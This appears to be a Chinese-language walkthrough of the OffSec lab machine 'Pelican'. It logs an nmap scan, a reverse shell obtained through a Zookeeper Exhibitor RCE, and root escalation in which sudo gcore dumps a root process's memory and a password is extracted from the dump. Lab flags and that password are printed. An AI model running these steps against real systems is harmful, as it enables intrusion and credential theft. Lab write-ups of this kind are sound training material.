主要知识点
- 当信息多的时候,耐心搜索
- Zookeeper exhibitor RCE漏洞
具体步骤
依旧执行Nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 22:44 UTC
Nmap scan report for 192.168.54.98
Host is up (0.00090s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
| 256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_ 256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp open ipp CUPS 2.2
|_http-title: Forbidden - CUPS v2.2.10
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/2.2 IPP/2.1
2181/tcp open zookeeper Zookeeper 3.4.6-1569965 (Built on 02/20/2014)
2222/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
| 256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_ 256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
8080/tcp open http Jetty 1.0
|_http-server-header: Jetty(1.0)
|_http-title: Error 404 Not Found
8081/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://192.168.54.98:8080/exhibitor/v1/ui/index.html
34051/tcp open java-rmi Java RMI
花了时间挨个搜索了一下,最终发现 http://192.168.215.98:8080/exhibitor/v1/ui/index.html 是有RCE漏洞的 https://kashz.gitbook.io/kashz-jewels/services/zookeeper-exhibitor,在本地启动nc -nlvp 80后,按下图修改,得到reverse shell和第一个flag
C:\home\kali\Documents\OFFSEC\GoToWork\Pelican> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.215.98] 44080
id
uid=1000(charles) gid=1000(charles) groups=1000(charles)
pwd
/opt/zookeeper
cd /home
ls -l
total 4
drwxr-xr-x 3 charles charles 4096 Sep 10 2020 charles
cd charles
ls -l
total 4
-rw-r--r-- 1 charles charles 33 Oct 13 18:49 local.txt
cat local.txt
150f6cb4c2aeb41502e3e2785af704ed
继续调查SUID和SUDO -l,分别得到
find / -type f -perm -4000 2>/dev/null
......
......
/usr/bin/password-store
......
......
和
sudo -l
Matching Defaults entries for charles on pelican:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on pelican:
(ALL) NOPASSWD: /usr/bin/gcore
查看一下/usr/bin/gcore的脚本,看起来是可以dump进程数据的,
https://wiki.sentnl.io/security/hacking-demos/getting-passwords-of-logged-in-users
尝试去寻找和Password相关的进程,没太多发现, 启动一下/usr/bin/password-store后再dum其进程信息
ps -aef | grep password
root 513 1 0 18:46 ? 00:00:00 /usr/bin/password-store
root 15611 1 0 19:39 ? 00:00:00 /usr/bin/password-store -help
charles 15745 11245 0 19:40 ? 00:00:00 grep password
sudo /usr/bin/gcore 513
0x00007f971bd1c6f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffc3d7a2c80, remaining=remaining@entry=0x7ffc3d7a2c80) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
Saved corefile core.513
[Inferior 1 (process 513) detached]
ls -l
total 155828
-rw-r--r-- 1 root root 154185840 Oct 13 19:21 core.1
-rw-r--r-- 1 root root 3148192 Oct 13 19:22 core.1322
-rw-r--r-- 1 root root 1861600 Oct 13 19:31 core.466
-rw-r--r-- 1 root root 354448 Oct 13 19:40 core.513
-rw-r--r-- 1 charles charles 33 Oct 13 18:49 local.txt
发现有趣的信息
strings core.513
001 Password: root:
ClogKingpinInning731
构建python full pty后su root,得到root权限
whereis python
python: /usr/bin/python /usr/bin/python3.7 /usr/bin/python2.7 /usr/bin/python3.7m /usr/lib/python3.7 /usr/lib/python2.7 /etc/python /etc/python3.7 /etc/python2.7 /usr/local/lib/python3.7 /usr/local/lib/python2.7 /usr/share/python /usr/share/man/man1/python.1.gz
/usr/bin/python -c 'import pty;pty.spawn("/bin/bash")'
charles@pelican:~$ su root
su root
Password: ClogKingpinInning731
root@pelican:/home/charles# id
id
uid=0(root) gid=0(root) groups=0(root)
root@pelican:/home/charles# cat /root/proof.txt
cat /root/proof.txt
c82d1cafd57e2e2685beba1998f9cf9c
